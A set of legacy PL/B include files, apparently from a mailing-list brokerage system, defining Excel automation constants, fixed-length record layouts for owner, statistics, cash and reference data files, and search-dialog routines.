.//This constant was found in the Object Browser in Excel under the Help topic for the
.//HorizontalAlignment property of the Range object.
AlignLeft integer 4,"0xffffefdd"
AlignRight integer 4,"0xffffefc8"
AlignCenter integer 4,"0xffffeff4"
.//Tells how many sheets by default will appear in a new workbook - in 2003 it's 3
SheetsDefault integer 4,"0x00000000"
xlPortrait integer 4,"0x1" .1
xlLandscape integer 4,"0x2" .2
xlMinimized integer 4,"0xFFFFEFD4"
xlUnderlineStyleSingle integer 4,"0x2"
.// //LineStyle 1 = Continuous
.// //LineStyle 4 = Dash Dot
.// //Object Viewer Help tells us that xlInsideHorizontal has a value of "12" Decimal
.// //Object Viewer Help tells us that xlInsideVertical has a value of "11" Decimal
.// //Object Viewer Help tells us that xlEdgeright has a value of "10" Decimal
.// sheet.range("B11:b37").BorderAround using *LineStyle=1,*Weight=3
.//Used to define range borders
xlInsideHorizontal integer 4,"0x12" .Borders inside defined range
xlInsideVertical integer 4,"0x11" .Borders inside defined range
XlEdgeRight integer 4,"0x10" .Borders right edge of defined range
.//Delete Cell and Direct Which way to shift cells
.// Sheet.Range("L1:L37").Delete Using xlShiftToLeft
.// Sheet.Range(CellRange).Delete Using xlShiftUp
.//
XLShiftToLeft Variant .range delete shift to left
XLShiftUp Variant .range delete shift Up
xlCSV Variant
xlDatabase integer 4,"0x1"
xlRowField integer 4,"0x1"
xlColumnField integer 4,"0x2"
xlsum Variant
xlDataAndLabel integer 4,"0x0"
xlPivotTableVersion12 integer 4,"0x3"
.//Variable used to pack with cell corrdinates
.// Pack Cell,"A","5"
Cell DIM 7
Cell1 DIM 7
.Cell DIM 5
.Cell1 DIM 5
.//Variable Used to pack range that you will set properties on.
.//Pack Cell,"A",Str5
.//Pack Cell1,"S",str5
.//Pack CellRange,Cell,":",Cell1
CellRange DIM 255
CellRowCnt Form 6
CellRowCnt1 Form 6
CellRowCnt2 Form 6
CurCellNum Form 6
.CellRowCnt Form 5
.CellRowCnt1 Form 5
.CellRowCnt2 Form 5
.CurCellNum Form 5
.//used to keep track of what row you are on for so you can id when a soft page break will occur - soft page break is when excel does an auto page break
.//Max row before a soft page break on page 1 - Page 1 appears to have a different max then do the other pages may be because i repeat the header on other pages.
RowMaxPage1 Form 9
.//Max row before a soft page break - all except page 1
RowMax Form 9 //Max row before a soft page break
.//Colors for font coloring
Red Color
RGB Form 24
SourceData VARIANT
XLSNAME DIM 255
.//Source Data for Pivot Table
. create SourceData,VarType=VT_BSTR,VarValue="diskin57!A1:F7308"
.//Create the Variant objects
.//Initialize variables
.//Zoom initialization Values
create Zoom85,VarType=VT_I4,VarValue=85
create Zoom80,VarType=VT_I4,VarValue=80
create Zoom75,VarType=VT_I4,VarValue=75
create Zoom70,VarType=VT_I4,VarValue=70
create Zoom65,VarType=VT_I4,VarValue=65
create Zoom60,VarType=VT_I4,VarValue=60
create Zoom55,VarType=VT_I4,VarValue=55
.//Boolean Values
create OTRUE,VarType=VT_BOOL,VarValue=1
create OFALSE,VarType=VT_BOOL,VarValue=0
.//should be defined by your prgram as they may need to be formatted differently
.// create xlColumnWidth,VarType=VT_R8,VarValue="0.0"
.//"1" increment in Excel interface equals "1.3888" in OLE logic
.// create TopMargin,VarType=VT_R8,VarValue="18" Roughly equals .25 inches: 18 * 1.388 = 25
.// create BottomMargin,VarType=VT_R8,VarValue="36" Roughly equals .50 inches: 36 * 1.388 = 50
.// create LeftMargin,VarType=VT_R8,VarValue="14" Roughly equals .25 inches: 18 * 1.388 = 25
.// create xlRowHeight,VarType=VT_R8,VarValue="15.0"
.//Constants
create xlPageBreakManual,VarType=VT_R8,VarValue="-4135"
create xlPageBreakAutomatic,VarType=VT_R8,VarValue="-4105"
create xlCenter,VarType=VT_R8,VarValue="-4108"
create xlBorderWeightMedium,VarType=VT_R8,VarValue="-4138"
create SheetIndex,VarType=VT_I4
create xlShifttoLeft,VarType=VT_R8,VarValue="-4159"
create xlShiftUp,VarType=VT_R8,VarValue="-4162"
create xlsum,VarType=VT_R8,VarValue="-4157" (&HFFFFEFC3)
create xlCSV,VarType=VT_I4,VarValue="6"
//create red for font
create Red=255:0:0
getitem Red,0,RGB
create Timeperiod,VarType=(VT_ARRAY+VT_BOOL),VarValue=OFALSE
.test1
. Move (VT_ARRAY+VT_BOOL),TimePeriod
.vtarrayt integer 4 ..array of integers
. MOVE (VT_ARRAY+VT_BOOL),vtarrayt ;or same as add in this case ;)
.CREATE safearray,VARTYPE=vtarrayt
<file_sep>/include/nowndd.inc
..............................................................................
.
. NOWNDD INCLUSION
. NIN OWNER FILE DEFINITION
.
. FILE NAME : NINOWN
. REC LENGTH: 190 FIXED
. INDEX KEY : 3-6 (OWNLON)
. AIM KEY : 7-56
.2015 February 12 : DLH add No shipping request logic
.2014 April 2 : DLH add lock logic
.2014 March DLH add room to email
.2011 August 23: DLH add more room & suppress LO print copies, and for future galley monthly report
.2010 June 04 : DLH add secondary file maint for DupeOwn
.2009Jan14 : comp codes DLH
.20080124 Email DLH
. 09Dec2000 Change IP address of File manager DMB
. 09Dec2000 use filelist
..10sep96 inactive code, batch code for lcr's, century - dlh
..16may95 add 2nd fax number for accounting.
..............................................................................
.
.NOWNNAME INIT "NINOWN.dat|20.20.30.103:502"
DOWNNAME INIT "DUPEOWN.dat|NINS1:502"
DOWNFLE1 IFILE KEYLEN=4,FIXED=120,Name="DupeOWN.isi|NINS1:502"
DOWNKEY DIM 4 1-4 *DUPE OWNER FILE.
Down1 DIM 1 5-5 Fill
Downkey2 DIM 4 6-9 OWNER NUMBER TO BE USED FROM DUPEOWN FILE.
Down2 DIM 1 10-10 FIll
DOWNDES DIM 50 11-60 DESCRIPTION
Down3 Dim 60 Fill
Downflg1 Form 1
Downfld Dim 4
.................................................................................
NOWNNAME INIT "NINOWN.dat|NINS1:502"
NOWNFLD DIM 4
OwnFList Filelist
.NOWNFLE1 IFILE KEYLEN=4,FIXED=190,Name="NINOWN.isi|20.20.30.103:502"
.NOWNFLE1 IFILE KEYLEN=4,FIXED=190,Name="NINOWN.isi|NINS1:502"
.NOWNFLE1 IFILE KEYLEN=4,FIXED=241,Name="NINOWN.isi|NINS1:502"
.NOWNFLE1 IFILE KEYLEN=4,FIXED=260,Name="NINOWN.isi|NINS1:502"
NOWNFLE1 IFILE KEYLEN=4,FIXED=310,Name="NINOWN.isi|NINS1:502"
.NOWNFLE2 AFILE FIXED=190,Name="NINOWN.AAM|20.20.30.103:502"
.NOWNFLE2 AFILE FIXED=190,Name="NINOWN.AAM|NINS1:502"
.NOWNFLE2 AFILE FIXED=241,Name="NINOWN.AAM|NINS1:502"
.NOWNFLE2 AFILE FIXED=260,Name="NINOWN.AAM|NINS1:502"
NOWNFLE2 AFILE FIXED=310,Name="NINOWN.AAM|NINS1:502"
.NOWNFLE1 IFILE KEYLEN=4,FIXED=190,Name="NINOWN.isi"
.NOWNFLE2 AFILE FIXED=190,Name="NINOWN.AAM"
filelistend
NOWNFLE3 FILE FIXED=310
.NOWNFLE3 FILE FIXED=260
.NOWNFLE3 FILE FIXED=190
NOWNFLD2 DIM 53
NOWNFLG1 FORM 1
NOWNFLG2 FORM 1
NOWNFLG3 FORM 1
NOWNPATH FORM 1
NOWNLOCK FORM 1 0 or 1=File Locks, 3=Record Locks, 3=No Locks
.
ownvars list
OWNLOC DIM 1 001-002 'B'... "P" for PLI COnversion 'M' from MIN
OWNBLK DIM 1 002-002 BLANK '0 LIst owners that don't allow samples = 1
OWNLON DIM 4 003-006 OWNER NUMBER
OWNLONM DIM 25 007-031 CONTACT NAME
OWNOCPY DIM 25 032-056 COMPANY NAME
OWNLOSA DIM 25 057-081 ADDRESS
OWNLOCTY DIM 15 082-096 CITY
OWNLOS DIM 2 097-098 STATE
OWNLOZC DIM 10 099-108 ZIP CODE
OWNNEC DIM 1 109-109 NUMBER OF CARBON COPIES
OWNCTN DIM 16 110-125 CARBON COPY TO
OWNTELE DIM 10 126-135 TELEPHONE NUMBER
OWNPASS DIM 10 136-144 PERSON LAST UPDATED BY
OWNRDTE DIM 8 145-153 REVISED DATE mm,dd,cc,yy
owngally dim 1 154-154 'T'rue = lcr's get combined galley request
OWNTAXID DIM 15 155-169 TEFRA TAX ID CODE.
OWNFAX DIM 10 170-179 FAX NUMBER.
ownfax2 dim 10 178-189 2nd fax ie acct.
OWNstat DIM 1 190-190 "I"nactive
OwnTranFlag Dim 1 191-191 -Send Fulfilment info via: ' '=fax or print based on presence of fax#
. 2=FTP, 1= Email.......
.begin patch
OwnEmail Dim 100 192-291 corporate email
OwnCOMp Dim 6 292-297 company code
OwnCont Dim 3 298-300 Contact code
OwnCopy Dim 1 301-301 Y or " "-print LO copies of orders (default) or N-no print
OwnNoSHP Dim 1 302-302 N or " "-send LO shipping info requests (default) or Y-suppress requests (nshp0007.pls)
OwnFIll Dim 8 303-310
.OwnFIll Dim 9 302-310
.OwnEmail Dim 50 192-241 corporate email
.OwnCOMp Dim 6 242-247 company code
.OwnCont Dim 3 248-250 Contact code
.OwnCopy Dim 1 251-251 Y or " "-print LO copies of orders (default) or N-no print
.OwnFIll Dim 9 252-260
.end patch
+++-+---+-++--- -+
listend
..............................................................................*
LISTOFF
.PROGRAM ACCESS.
.NAME TYPE ACCESS
LISTON
<file_sep>/include/searchio.INC
...................................................................
.
. SEARCH INCLUSION
.
. HANDLES ALL COMMON ROUTINES USED WITH SEARCH.PLF
.
.
. RELEASE 1.5 DLH 2014 July 28 search for Service B.
. RELEASE 1.4 DLH 1/18/07 search for Fulfillment (RTN)
. RELEASE 1.3 ASH 10/26/04 ADDED LOGIC TO DISPLAY COMPANY NUMBER
. RELEASE 1.2 ASH 09/17/02 ADDED OWNER
. RELEASE 1.1 ASH 01/31/02 REPLACED DATALIST WITH MSLISTVIEW OBJECT
. RELEASE 1.0 ASH 03/10/99 INITIAL RELEASE
....................................................................
....................................................................
. ENTRY POINT: SEARCHSETTITLE
. REQUIRED : SEARCH.PLF
. RETURNED :
. DESCRIPTION: DYNAMICALLY CHANGES TITLE ON SEARCH.PLF
. PROGRAMMER : <NAME> 03/10/99
. INITIAL RELEASE
....................................................................
SearchSetTitle
.Dynamically changes
.START PATCH 1.4 ADDED LOGIC
.START PATCH 1.5 ADDED LOGIC
branch SrchFlag to SearchSetTit1,SearchSetTit2,SearchSetTit3,SearchSetTit4,SearchSetTit5,SearchSetTit6,SearchSetTit7,SearchSetTit8
. branch SrchFlag to SearchSetTit1,SearchSetTit2,SearchSetTit3,SearchSetTit4,SearchSetTit5,SearchSetTit6,SearchSetTit7
.End PATCH 1.5
. branch SrchFlag to SearchSetTit1,SearchSetTit2,SearchSetTit3,SearchSetTit4,SearchSetTit5,SearchSetTit6
.End PATCH 1.4 ADDED LOGIC
SearchSetTit1
setprop Search,title="Broker Search"
goto SearchSetTitDone
SearchSetTit2
setprop Search,title="List Search"
goto SearchSetTitDone
SearchSetTit3
setprop Search,title="Mailer Search"
goto SearchSetTitDone
SearchSetTit4
setprop Search,title="Ship-To Search"
goto SearchSetTitDone
SearchSetTit5
setprop Search,title="Campaign Search"
goto SearchSetTitDone
.START PATCH 1.2 ADDED LOGIC
SearchSetTit6
setprop Search,title="Owner Search"
goto SearchSetTitDone
.END PATCH 1.2 ADDED LOGIC
.START PATCH 1.4 ADDED LOGIC
SearchSetTit7
setprop Search,title="Fulfillment (RTN-To) Search"
goto SearchSetTitDone
.END PATCH 1.4 ADDED LOGIC
.START PATCH 1.5 ADDED LOGIC
SearchSetTit8
setprop Search,title="Service Bureau Search"
goto SearchSetTitDone
.END PATCH 1.4 ADDED LOGIC
SearchSetTitDone
return
....................................................................
. ENTRY POINT: SEARCHSETVISIBLE
. REQUIRED : SEARCH.PLF
. RETURNED :
. DESCRIPTION: REFRESHES SEARCH.PLF AND MAKES VISIBLE
. PROGRAMMER : <NAME> 03/10/99
. INITIAL RELEASE
....................................................................
SearchSetVisible
setitem SearchComboBox,0,SrchFlag
setitem SearchCheckFree,0,1
setitem SearchEditText,0,""
setitem SearchStatText2,0,""
setitem SearchStatText3,0,""
setitem SearchStatText4,0,""
.START PATCH 1.3 REPLACED LOGIC
setitem SearchStatText6,0,""
.END PATCH 1.3 REPLACED LOGIC
.START PATCH 1.1 REPLACED LOGIC
. deleteitem SearchDataList,0
SearchListView.ListItems.Clear
.END PATCH 1.1 REPLACED LOGIC
setfocus SearchEditText
setprop Search,visible=1
return
....................................................................
. ENTRY POINT: SEARCHENABLE
. REQUIRED : SEARCH.PLF
. RETURNED :
. DESCRIPTION: ENABLES BUTTONS, USUALLY FOLLOWED BY ANOTHER 'RETURN' TO
. SEARCH.PLF AFTER AN ERROR MESSAGE REGARDING SEARCHING.
. PROGRAMMER : <NAME> 03/10/99
. INITIAL RELEASE
....................................................................
SearchEnable
setfocus SearchEditText
reset SrchKey
setprop SearchOK,enabled=1
setprop SearchClose,enabled=1
setprop SearchComboBox,enabled=1
return
....................................................................
. ENTRY POINT: SEARCHCLEAR
. REQUIRED : SEARCH.PLF
. RETURNED :
.START PATCH 1.1 REPLACED LOGIC
.. DESCRIPTION: CLEARS DATALIST AND STATTEXT BOXES, USUALLY BEFORE A SEARCH
. DESCRIPTION: CLEARS LISTVIEW AND STATTEXT BOXES, USUALLY BEFORE A SEARCH
.END PATCH 1.1 REPLACED LOGIC
. PROGRAMMER : <NAME> 03/10/99
. INITIAL RELEASE
....................................................................
SearchClear
.START PATCH 1.1 REPLACED LOGIC
. deleteitem SearchDataList,0
SearchListView.ListItems.Clear
.END PATCH 1.1 REPLACED LOGIC
setitem SearchStatText2,0,""
setitem SearchStatText3,0,""
setitem SearchStatText4,0,""
.START PATCH 1.1 ADDED LOGIC
setitem SearchStatText5,0,""
.END PATCH 1.1 ADDED LOGIC
.START PATCH 1.3 REPLACED LOGIC
setitem SearchStatText6,0,""
.END PATCH 1.3 REPLACED LOGIC
return
<file_sep>/include/statsdd.inc
..............................................................................
.
. statsDD INCLUSION
. Stats FILE DEFINITION
.
. FILE NAME : NINSTATs
. REC LENGTH: FIXED
. INDEX KEY :
.
.Patch 01/25/2005 - ASH Converted Mailer/Broker fields
.Patch 04/17/2002 - ASH Added Select Universe field
.Patch 02/22/2002 - ASH Added Busy Byte
.Patch 02/20/2002 - ASH Added Aamdex for History Screen in Program 1
..............................................................................
.
StatFLst Filelist
.Start Patch 01/25/2005 - Replaced logic
.statFILE IFILE KEYLEN=29,FIXED=501,UNCOMP,Name="NINSTATS.ISI|20.20.30.103:502"
.statFLE2 IFILE KEYLEN=6,FIXED=501,UNCOMP,Name="NINSTAT2.ISI|20.20.30.103:502"
..Start Patch 02/20/2002
.statFLE3 AFILE FIXED=501,UNCOMP,Name="NINSTATS.AAM|20.20.30.103:502"
..End Patch 02/20/2002
....................................
.Patch 06/18/2005 Begin
.statFILE IFILE KEYLEN=31,FIXED=501,UNCOMP,Name="NINSTATS.ISI|20.20.30.103:502"
statFILE IFILE KEYLEN=31,FIXED=501,UNCOMP,Name="NINSTATS.ISI|NINS1:502"
.statFLE2 IFILE KEYLEN=6,FIXED=501,UNCOMP,Name="NINSTAT2.ISI|20.20.30.103:502"
statFLE2 IFILE KEYLEN=6,FIXED=501,UNCOMP,Name="NINSTAT2.ISI|NINS1:502"
.statFLE3 AFILE FIXED=501,UNCOMP,Name="NINSTATS.AAM|20.20.30.103:502"
statFLE3 AFILE FIXED=501,UNCOMP,Name="NINSTATS.AAM|NINS1:502"
.End Patch 01/25/2005 - Replaced logic
.statFILE IFILE KEYLEN=29,FIXED=501,UNCOMP,Name="NINSTATS.ISI"
.statFLE2 IFILE KEYLEN=6,FIXED=501,UNCOMP,Name="NINSTAT2.ISI"
.statFILE IFILE KEYLEN=29,FIXED=501,UNCOMP,Name="NINSTATS.ISI"
.statFLE2 IFILE KEYLEN=6,FIXED=501,UNCOMP,Name="NINSTAT2.ISI"
Filelistend
statNAME INIT "NINSTATS"
statNME2 INIT "NINSTAT2"
.PROJECTION FILE
Stat2FLst Filelist
.stat2FILE IFILE KEYLEN=9,FIXED=501,UNCOMP,Name="NIN2STATS.ISI|20.20.30.103:502"
stat2FILE IFILE KEYLEN=9,FIXED=501,UNCOMP,Name="NIN2STATS.ISI|NINS1:502"
.stat2FLE2 AFILE FIXED=501,UNCOMP,Name="NIN2STATS.AAM|20.20.30.103:502"
stat2FLE2 AFILE FIXED=501,UNCOMP,Name="NIN2STATS.AAM|NINS1:502"
.stat2FILE IFILE KEYLEN=9,FIXED=501,UNCOMP,Name="NIN2STATS.ISI"
.stat2FLE2 AFILE FIXED=501,UNCOMP,Name="NIN2STATS.AAM"
Filelistend
.Patch 06/18/2005 End
stat2NAME INIT "NIN2STATS"
.stat2NME2 INIT "NIN2STAT2"
.PROJECTION FILE END
.Start Patch 01/25/2005 - Replaced logic
.statFLD dim 29 ninmlr+source 1-4,117-141
statFLD dim 31 ninmlr+source 1-6,119-143
.End Patch 01/25/2005 - Replaced logic
statfld2 dim 6 nin LR 254-259
.Start Patch 02/20/2002
.Start Patch 01/25/2005 - Replaced logic
.statfld4 dim 7 statmlr (AAMKEY)
statfld4 dim 9 statmlr (AAMKEY)
.End Patch 01/25/2005 - Replaced logic
statfld5 dim 28 statpckcde (AAMKEY)
.End Patch 02/20/2002
STAT2FLD DIM 9 NIN LR + STATNUM
STAT2FLD2 DIM 9 NIN LR (AAMKEY)
STAT2FLD3 DIM 4 STATLOL (AAMKEY)
.Start Patch 02/20/2002
.Start Patch 01/25/2005 - Replaced logic
.stat2fld4 dim 7 NINMLR (AAMKEY) .NOT YET IMPLEMENTED
stat2fld4 dim 9 NINMLR (AAMKEY) .NOT YET IMPLEMENTED
.End Patch 01/25/2005 - Replaced logic
.End Patch 02/20/2002
statFLAG FORM 1
statFLAg2 FORM 1
stat2flag FORM 1
statpath form 1
StatLOCK FORM 1 0 & 1=FILEPI, 2=REcord lock, 3=no lock
.
statvars list
.Start Patch 01/25/2005 - Replaced logic
.statmlr dim 4 1-4 NINCAL's mlr number for client
statmlr dim 6 1-6 NINCAL's mlr number for client
.End Patch 01/25/2005 - Replaced logic
statcampn dim 30 7-36 Campaign description
statmdate dim 8 37-44 mm,dd,cc,yy maildate
statwkso form 6 45-50 weeks out
statpdate dim 8 51-58 mail processed thru
statpanel dim 60 59-118 package description
statsrce dim 25 119-143 mlr source code
statldes dim 30 144-173 Mlr's list desc
statsel dim 30 174-203 list select
Statlist dim 6 204-209 ninca's list number
stattype dim 1 210-210 list type Continuation or Test, or Rent, Exchange, Split
statmqty form 8 211-218 quantity mailed
statresp form 7 219-225 number of responses
statrev form 9 226-234 gross revenue
statlcpm form 4.2 235-241 list cost per m
statImcst form 6.2 242-250 In mail cost per M = all costs.
.Start Patch 01/25/2005
.Added padding for future LR increase
statlr2 dim 3 251-253
.End Patch 01/25/2005
statlr dim 6 254-259 nin List Rental number
.Following field currently only used by TNC. Field was added in 1999 and is the TNC List Code. They currently
.only use part of the designated space - 4 bytes ASH 27NOV2001
statkycd dim 25 260-284 Mailers key code
Statpack form 5.2 285-292 total package cost
Statpckm form 5.2 293-300 total package cost per thous
statLVal FORM 4.2 301-307 Lifetime Value
statpckcde DIM 25 308-332 .changged 19June2001 to facilitate tracking TNC packages.
statpcknum dim 6 333-338 .Our Package Number
statLOL dim 1 339-339 .0=LR Record, 1=LOL Record
statgift form 4.2 340-346 .Average Gift
statresp2 form 3.2 347-352 .Response Rate
statnetreq form 3.2 353-358 .Net Requested
statnetrec form 3.2 359-364 .Net Received
statexbase form 6.2 365-373 .Exchange Base
statrbase form 6.2 374-382 .Rent Base
statrun form 6.2 383-391 .Running Charge
statselfee form 6.2 392-400 .Select Fee
statship form 6.2 401-409 .Ship/Tape
statpckprem form 6.2 410-418 .Package Premium Price
statrecqty form 9 419-427 .Recommended Qty
statavgnet form 3.2 428-433 .Net Qty
statnum dim 3 434-436
.START PATCH 03/22/2002
statcode dim 1 437-437 .Busy byte
.END PATCH 03/22/2002
.START PATCH 03/22/2002
statseluni form 9 438-446 .Select Universe
.END PATCH 03/22/2002
statfiller dim 55 447-501 .Filler for future fields
listend
.Following Variables used for Calculation of derived fields - NOT INCLUDED IN STATVARS!!!!!!
CALCSTATEXTOT FORM 6.2
CALCSTATRTOT FORM 6.2
CALCSTATNETREQ FORM 3.2
CALCSTATCOSTMEM FORM 6.2
.
CALCSTATNETP FORM 9.4
CALCSTATNETNAME FORM 9.4
CALCSTATTOTCOST FORM 9.4
CALCSTATLSTCOST FORM 9.4
CALCSTATPROCOST FORM 9.4
.END OF INCLUDE
.
..............................................................................
<file_sep>/include/GTBLDD.INC
..............................................................................
.
. GTBLDD INCLUSION
. TABLE FILE DEFINITION
.
. FILE NAME : TABLEFLE
. REC LENGTH: 79 FIXED
. INDEX KEY : 1-8 (TABLE CODE, TABLE DESIGNATION)
.
..............................................................................
.
GTBLFILE IFILE KEYLEN=8
GTBLNAME INIT "TABLEFLE"
GTBLFLD DIM 8
GTBLFLAG FORM 1
.
TBLCODE DIM 8 001-008 TABLE CODE - key
TBLTEXT DIM 71 009-079 TEXT
.
..............................................................................
<file_sep>/DEVELOP/Includes - why/NCSHDD.INC
.............................................................................
. NCSHDD INCLUSION
. CASH FILE DESCRIPTION.
.
. FILE NAMES: DAT25Nx & DAT25Px patch 1.5
. REC LENGTH: 132
. INDEX : (1) 9-14 LR #
. AIM KEY : (1) 1-2 DUPE ID
. (2) 25-37 AMOUNT.
. (3) 40-42 CONTROL #.
. (4) 43-54 CHECK #
. (5) 110-117 CONTROL DATE
.Patch 1.6 DLH 09/12/2007 PLI add External code I - INter company transaction
.Patch 1.5 DLH 06/12/2007 PLI
.patch 1.4 ASH 01/10/2005 Increased Mailer/Broker/Check fields.
.patch 1.3 ASH Increased ISAM for Control, so added Control date. Added filler.
.patch 1.2 Added FileList, Added Check as AamKey
.patch 1.1 aug99 DLH get rid of EBCDIC
..............................................................................
NCSHFILE FILE
.START PATCH 1.2 REPLACED LOGIC
. IFNZ PC
.NCSHFIL2 AFILE
. XIF
. IFZ PC
..NCSHFIL2 AFILE 15,2,,FIXED=71,uncomp
..NCSHFIL2 AFILE FIXED=71,uncomp
..begin patch 1.1
..NCSHFIL2 AFILE FIXED=93,uncomp .-23-29,32-35
.NCSHFIL2 AFILE FIXED=99,uncomp .-23-35,38-40,41-46
. XIF
..NcshFiL3 IFILE KEYLEN=6,FIXED=71,DUP,uncomp
..NcshFiL3 IFILE KEYLEN=6,FIXED=93,DUP,uncomp
.NcshFiL3 IFILE KEYLEN=6,FIXED=99,DUP,uncomp .-7-12
..end patch 1.1
NCSHLIST Filelist
NCSHFIL2 AFILE NAME="DAT25N.AAM"
NcshFiL3 IFILE NAME="DAT25N.ISI"
Filelistend
.END PATCH 1.2 REPLACED LOGIC
NCSHNAME INIT "DAT25N "
NCSHFLD DIM 16
NCSHFLD2 DIM 6
NCSHFLD3 DIM 6
.START ADDED FOR NEW GUI PROGRAM
.START PATCH 1.4 REPLACED LOGIC
.NCSHFLD4 DIM 9
NCSHFLD4 DIM 15
.END PATCH 1.4 REPLACED LOGIC
NCSHFLD1 DIM 5
.END ADDED FOR NEW GUI PROGRAM
.START PATCH 1.3 ADDED LOGIC
NCSHFLD5 DIM 11
.END PATCH 1.3 ADDED LOGIC
NCSHFLAG FORM 1
NCSHFLG2 FORM 2
NCSHFLG3 FORM 2
NCSHPATH FORM 1 1=SEQ,2=AIM
NCSHLOCK FORM 1 0 or 1=File Locks, 2=Record Locks, 3=No Locks
...............................................................................
cashvars list
CID DIM 2 POSITION 1-2 RECORD ID.
.START PATCH 1.4 REPLACED LOGIC
.CMLR DIM 4 POSITION 3-6 MAILER NUMBER.
CMLR DIM 6 POSITION 3-8 MAILER NUMBER.
.END PATCH 1.4 REPLACED LOGIC
.DURING CONVERSION ON 1/25/2005 I forgot to add 3 blank spaces here for future increase in LR number. ASH
CLR DIM 6 POSITION 9-14 LIST RENTAL NUMBER.
CFILL1 DIM 2 POSITION 15-16 NOT USED.
CCE DIM 2 POSITION 17-18 CENTURY RECORD ENTERED.
CYR DIM 2 POSITION 19-20 YEAR RECORD ENTERED.
CMO DIM 2 POSITION 21-22 MONTH RECORD ENTERED.
CDY DIM 2 POSITION 23-24 DAY RECORD ENTERED.
.CMO DIM 2 POSITION 15-16 MONTH RECORD ENTERED.
.CDY DIM 2 POSITION 17-18 DAY RECORD ENTERED.
.CYR DIM 2 POSITION 19-20 YEAR RECORD ENTERED.
..ASH Added following field 06Nov98 for Y2K compliance, increased position for other fields
.CCE DIM 2 POSITION 21-22 CENTURY RECORD ENTERED.
.begin patch 1.1
.CAMOUNT DIM 7 POSITION 23-29 AMOUNT OF CASH IN. minus overpunch
CAMOUNT FORM 10.2 POSITION 25-37 AMOUNT OF CASH IN.
.end patch 1.1
CEXTCD DIM 1 POSITION 38-38 EXTERNAL CODE.
. M = Manual - discouraged.
. P = Owner was previously paid do not cut check or overwrite manual check info.
. O = Apply funds to A/R from Money on Account.
. Q = TYPE P + TYPE O.
. A = Do not close invoice. Mlr still owes, but cut check to LO. & flag/adjust A/P
. not yet implemented.
. D = Apply Money to MOA requires MLR/BRK/CHK Number LR optional
. I = Inter Company Transaction Do not cut check - just used to record income
CFILL2 DIM 1 POSITION 39-39 NOT USED.
CNUM DIM 3 POSITION 40-42 CONTROL NUMBER.
.START PATCH 1.4 REPLACED LOGIC
.NCSHCHK DIM 6 43-48 Mailers check number.
NCSHCHK DIM 12 43-54 Mailers check number.
.END PATCH 1.4 REPLACED LOGIC
nckdtec dim 2 55-56 Mailer check date century.
nckdtey dim 2 57-58 Mailer check date year.
nckdtem dim 2 59-60 Mailer check date month.
nckdted dim 2 61-62 Mailer check date day.
.nckdtey dim 2 51-52 Mailer check date year.
.nckdtec dim 2 53-54 Mailer check date century.
.ASH Increased following field 06Nov98 to reflect new size of field in NINMLR/NINBRK
.npayor dim 25 49-73 mailer/broker who paid us
.START PATCH 1.2 REPLACED LOGIC
.npayor dim 45 55-99 mailer/broker who paid us
npayor dim 41 63-103 mailer/broker who paid us
.START PATCH 1.4 REPLACED LOGIC
.NCSHBRK DIM 4 96-99 Broker Number
NCSHBRK DIM 6 104-109 Broker Number
.END PATCH 1.4 REPLACED LOGIC
.END PATCH 1.2 REPLACED LOGIC
.START PATCH 1.3 ADDED LOGIC
CNUMDATE DIM 8 110-117 Control Date
.begin patch 1.5
CCOMPID Dim 1 118-118 COmpany ID "N" or " " = NIN "P" = PLI
.end patch 1.5
CFiller dim 14 119-132 Filler
.CFiller dim 15 118-132 Filler
.end patch 1.5
.END PATCH 1.3 ADDED LOGIC
listend
..
LISTOFF
.PROGRAM
.
.NCHK0001
.NCHK0002
.NCHK0003
.
LISTON
<file_sep>/include/nrefdd.inc
* NREFDD.INC
* *****************************************************************************
* NAMES IN THE NEWS MASTER DATACARD REFERENCE FILE.
* *****************************************************************************
.
. FILE: NINREF
. LENGTH: 100
. TYPE: ISAM/AAM
. KEY: 1-1 NREFCODE
. 2-4 NREFNUM
. AAMKEY: 1-1 NREFCODE
.
.patch 2016 May 11 filepi,record lock, no lock options
.patch 3 2014 August 8 add description to the aam key
.Patch MAY 2011 - Add SRDS and expand
.Patch August 2006 - Add Min codes
...............................................................................
NREFNAME INIT "NINREF"
NREFFLIST FILELIST
NREFFILE IFILE KEYLEN=4,FIXED=100,Name="NINREF.isi|NINS1:502"
NREFFLE3 IFILE KEYLEN=3,FIXED=100,Name="NINREFMin.isi|NINS1:502" .min key
NREFFLE2 AFILE FIXED=100,Name="NINREF.aam|NINS1:502"
NREFFLE4 IFILE KEYLEN=35,FIXED=100,Name="NINREFSRDS.isi|NINS1:502" .SRDS Key
.NREFFILE IFILE KEYLEN=4,FIXED=81,Name="NINREF.isi|NINS1:502"
.NREFFLE3 IFILE KEYLEN=3,FIXED=81,Name="NINREFMin.isi|NINS1:502" .min key
.NREFFLE2 AFILE FIXED=81,Name="NINREF.aam|NINS1:502"
.NREFFLE4 IFILE KEYLEN=28,FIXED=81,Name="NINREFSRDS.isi|NINS1:502" .SRDS Key
FILELISTEND
NREFFLAG FORM 1
NREFFLD DIM 4 .main Isam key
NREFFLD1 DIM 4 .aam key 1
NrefFld3 Dim 3 .Min
NrefFld4 Dim 35 .srds
.begin patch 3.0
NrefFld5 Dim 49 .aam key 2 description
.end patch 3.0
NREFPATH FOrm 1
NrefLock Form 1
.
NREFVARS LIST
NREFCODE DIM 1 1-1 REFERENCE CODE TYPE
.TYPE OF CODES
.1 "A" ADDRESSING CODE
.2 "C" CLEANED CODE
.3 "D" DELIVERY CODE
.4 "L" SELECTION CODE
.5 "M" MEDIA CODE
.6 "N" NET NAME CODE
.7 "P" SAMPLE CODE
.8 "R" ARRANGEMENT CODE
.9 "S" SOURCE CODE
.10 "T" CATEGORY CODE
NREFNUM DIM 3 2-4 REFERENCE #
NREFDESC DIM 46 5-50 DESCRIPTION aam key fld5
NrefMin Dim 3 51-53 MIN code key
NrefSRDS Dim 35 54-88 SRDS - KEY
NREFFILL DIM 12 89-100 FILLER
.NREFFILL DIM 28 54-81 FILLER
.NREFFILL DIM 31 52-81 FILLER
LISTEND
NREFSTR DIM 150
.Min code descriptions need to be added.
.first pass
.1 "B" Business
.2 "C" Consumer
.3 "A" AGE
.4 "D" Dollar select
.5 "E" Enhance select
.6 "F" FSA
.7 "G" Geographic ??
.8 "H"
.9 "L" Media
.10 "M"
.11 "P"
.12 "R"
.13 "T"
.14 "U" UNinverse
.15 "X" special pricing / commission ??
.16 "W" web related ??
<file_sep>/include/nrtndd.inc
. Last change: DLH 6/13/2002 11:01:20 AM
..............................................................................
.
. NRTNDD INCLUSION
. NIN RETURN-TO FILE DEFINITION
.
. FILE NAME : NINRTN
